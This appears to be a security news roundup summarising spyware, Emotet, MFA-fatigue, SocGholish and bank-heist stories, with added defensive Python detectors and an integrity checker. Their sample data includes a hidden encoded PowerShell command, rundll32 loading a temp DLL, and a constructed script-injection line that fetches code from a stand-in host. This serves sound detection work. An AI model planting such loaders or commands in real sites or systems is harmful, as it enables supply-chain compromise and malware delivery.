AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

InfoSec News Nuggets 11/04/2022

New SandStrike spyware targets Android users with booby-trapped VPN application

To lure victims into downloading the spyware implants, adversaries set up Facebook and Instagram accounts with more than 1,000 followers and designed attractive religious-themed graphic materials, setting up an effective trap for adherents of this belief. Most of these social media accounts contain a link to a Telegram channel also created by the attacker. In this channel, the actor behind SandStrike distributed a seemingly harmless VPN application for accessing sites banned in certain regions, for example religious-related materials. To make this application fully functional, adversaries also set up their own VPN infrastructure. However, the VPN client contains fully functioning spyware with capabilities that allow threat actors to collect and steal sensitive data, including call logs and contact lists, and to track any further activities of persecuted individuals.

Emotet botnet starts blasting malware again after 5 month break

The Emotet malware operation is again spamming malicious emails after an almost five-month “vacation” that saw little activity from the notorious cybercrime operation. Emotet is a malware infection distributed through phishing campaigns containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL is downloaded and loaded into memory. Once loaded, the malware searches for and steals emails to use in future spam campaigns and drops additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.
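The infection chain above (Office document, macro enabled, DLL fetched and loaded) leaves a characteristic parent/child process relationship that endpoint telemetry can catch. The following is an added example, not code from the AboutDFIR post or the article it summarises: a minimal detection run over constructed process-creation events. The Office parent names and the DLL-loader and script-host child names are assumptions based on general tradecraft, not details the post states; tune them to your own environment's baseline.

```python
"""
Added detection example (not from the original post): flag Office
applications spawning DLL loaders or script hosts, the pattern a
macro-delivered DLL download tends to produce.
"""

# Assumed process names; adjust to what is normal in your estate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# Constructed sample events in a simplified, EDR-like shape.
SAMPLE_EVENTS = [
    {"ts": "2022-11-04T08:12:01", "host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\invoice.dll,Start"},
    {"ts": "2022-11-04T08:13:44", "host": "ws02",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc AAAA"},
    # Benign: explorer launching rundll32 for a control panel applet.
    {"ts": "2022-11-04T08:20:00", "host": "ws03",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    # Benign: Excel spawning the print spooler helper.
    {"ts": "2022-11-04T08:25:10", "host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def suspicious_office_children(events):
    """Return (host, parent, child, cmdline) for every event where an
    Office process spawned a DLL loader or script host."""
    hits = []
    for ev in events:
        parent = basename(ev["parent"])
        child = basename(ev["image"])
        if parent in OFFICE_PARENTS and (child in DLL_LOADERS or child in SCRIPT_HOSTS):
            hits.append((ev["host"], parent, child, ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for hit in suspicious_office_children(SAMPLE_EVENTS):
        print("ALERT", *hit)
```

The rule is deliberately narrow: it keys on the parent/child pair rather than on any file name or hash, so it survives the payload being renamed, and the benign events show where a real deployment would need allow-listing rather than a broader match.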

Multi-factor auth fatigue is real – and it’s why you might be in the headlines next

The September cyberattack on ride-hailing service Uber began when a criminal bought the stolen credentials of a company contractor on the dark web. The miscreant then repeatedly tried to log into the contractor’s Uber account, triggering the two-factor login approval request that the contractor initially denied, blocking access. However, eventually the contractor accepted one of many push notifications, enabling the attacker to log into the account and get access to Uber’s corporate network, systems, and data. The app maker became the latest high-profile victim of multi-factor authentication (MFA) fatigue, an ever-growing cybersecurity problem in which attackers are able to work their way around a cornerstone of modern defenses at a time when threat groups are shifting their focus away from infecting endpoints and instead are targeting identity.
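The sequence described above, many push prompts rejected and then one accepted, is visible in identity-provider logs before the attacker does anything else. The following is an added example, not code from the AboutDFIR post or the article it summarises: a detector run over constructed MFA push events. The event shape and the result values ("approved", "denied", "timeout") are assumptions; map your IdP's fields onto them.

```python
"""
Added detection example (not from the original post): flag an MFA push
approval that was preceded by a burst of rejected or timed-out pushes for
the same account within a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, user, push result).
SAMPLE_EVENTS = [
    ("2022-11-04T02:00:01", "contractor1", "denied"),
    ("2022-11-04T02:00:40", "contractor1", "denied"),
    ("2022-11-04T02:01:15", "contractor1", "timeout"),
    ("2022-11-04T02:02:05", "contractor1", "denied"),
    ("2022-11-04T02:03:30", "contractor1", "approved"),   # fatigue pattern
    ("2022-11-04T09:15:00", "alice", "approved"),          # normal login
    ("2022-11-04T09:16:00", "alice", "denied"),            # one mis-tap
    ("2022-11-04T09:17:00", "alice", "approved"),
]


def find_mfa_fatigue(events, window=timedelta(minutes=10), min_rejects=3):
    """Return (user, approval_time, rejects_before) for every approval that
    was preceded, within `window`, by at least `min_rejects` denied or
    timed-out pushes for the same user."""
    by_user = defaultdict(list)
    for ts, user, result in events:
        by_user[user].append((datetime.fromisoformat(ts), result))

    hits = []
    for user, entries in by_user.items():
        entries.sort()
        for i, (ts, result) in enumerate(entries):
            if result != "approved":
                continue
            rejects = sum(
                1 for prev_ts, prev_result in entries[:i]
                if prev_result in ("denied", "timeout") and ts - prev_ts <= window
            )
            if rejects >= min_rejects:
                hits.append((user, ts.isoformat(), rejects))
    return hits


if __name__ == "__main__":
    for user, when, n in find_mfa_fatigue(SAMPLE_EVENTS):
        print(f"ALERT {user}: approval at {when} after {n} rejected pushes")
```

Detection after the fact is the fallback; the preventive controls are number matching (the user must type a code shown on the login screen, so a blind tap cannot approve) and rate-limiting how many pushes one account can receive in a window. The thresholds here are starting points, not tuned values.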

More than 250 US news sites inject malware in possible supply chain attack

Researchers at Proofpoint disclosed in a Tweet Wednesday that more than 250 U.S. news organizations have accessed malicious SocGholish malware in what could potentially become a very dangerous supply chain attack. In the Tweet, Proofpoint said it observed intermittent injections on a media company that serves video and advertising services to many major news outlets. The targeted media company serves content via JavaScript to its partners, and by modifying the codebase of this otherwise benign JavaScript, the threat actors used the media company to deploy the SocGholish malware.
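The weak point in the story above is that each news site trusts a partner's script byte-for-byte, so a modification upstream reaches every visitor. Subresource Integrity (SRI) is the browser-side control for exactly this: the page pins a hash in the script tag's integrity attribute and the browser refuses to run content that does not match. The following is an added example, not code from the AboutDFIR post or from Proofpoint's reporting: it computes SRI values and checks a fetched copy against a pinned one. The two script bodies are constructed for the example.

```python
"""
Added example (not from the original post): Subresource Integrity hashes
for a third-party script and a drift check against the pinned value.
"""
import base64
import hashlib
import hmac

# Constructed partner script and a constructed modified copy with an
# extra loader line appended, standing in for an upstream tampering.
BENIGN_SCRIPT = b"(function(){window.partnerPlayer={load:function(id){}};})();\n"
MODIFIED_SCRIPT = BENIGN_SCRIPT + (
    b"var s=document.createElement('script');"
    b"s.src='https://example.invalid/x.js';document.head.appendChild(s);\n"
)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity value, e.g. 'sha384-<base64 digest>'."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows sha256, sha384 or sha512 only")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Build a <script> tag that pins `content` via SRI. The crossorigin
    attribute is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def matches_pin(pinned: str, fetched: bytes) -> bool:
    """True if the fetched bytes still hash to the pinned integrity value.
    Use this in a monitoring job that re-fetches partner scripts."""
    algo, _, _ = pinned.partition("-")
    return hmac.compare_digest(sri_hash(fetched, algo), pinned)


if __name__ == "__main__":
    pin = sri_hash(BENIGN_SCRIPT)
    print(script_tag("https://partner.example/player.js", BENIGN_SCRIPT))
    print("benign matches:", matches_pin(pin, BENIGN_SCRIPT))
    print("modified matches:", matches_pin(pin, MODIFIED_SCRIPT))
```

The caveat a practitioner will hit immediately: SRI only works when the partner's script is versioned and stable, because every legitimate update changes the hash and breaks the page until the pin is refreshed. Where the partner ships a frequently changing file, the `matches_pin` style re-fetch and alert on drift is the realistic fallback, paired with a Content Security Policy that limits which origins scripts may be loaded from.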

French-speaking voleurs stole $30m in 15-country bank, telecoms cyber-heist spree

A French-speaking criminal group codenamed OPERA1ER has pulled off more than 30 cyber-heists against telecom organizations and banks across Africa, Asia, and Latin America, stealing upwards of $30 million over four years, according to security researchers. The robberies start with targeted emails that trick staff at these businesses into running backdoor malware, keyloggers, and password stealers, according to Group-IB’s threat intel team, working with French telecom company Orange’s CERT Coordination Center. Crooks use the stolen credentials from these software nasties to gain admin-level credentials to Windows domain controllers on the network and banks’ back-end applications such as their SWIFT messaging clients, which financial institutions use to send and receive details of transactions from one another. 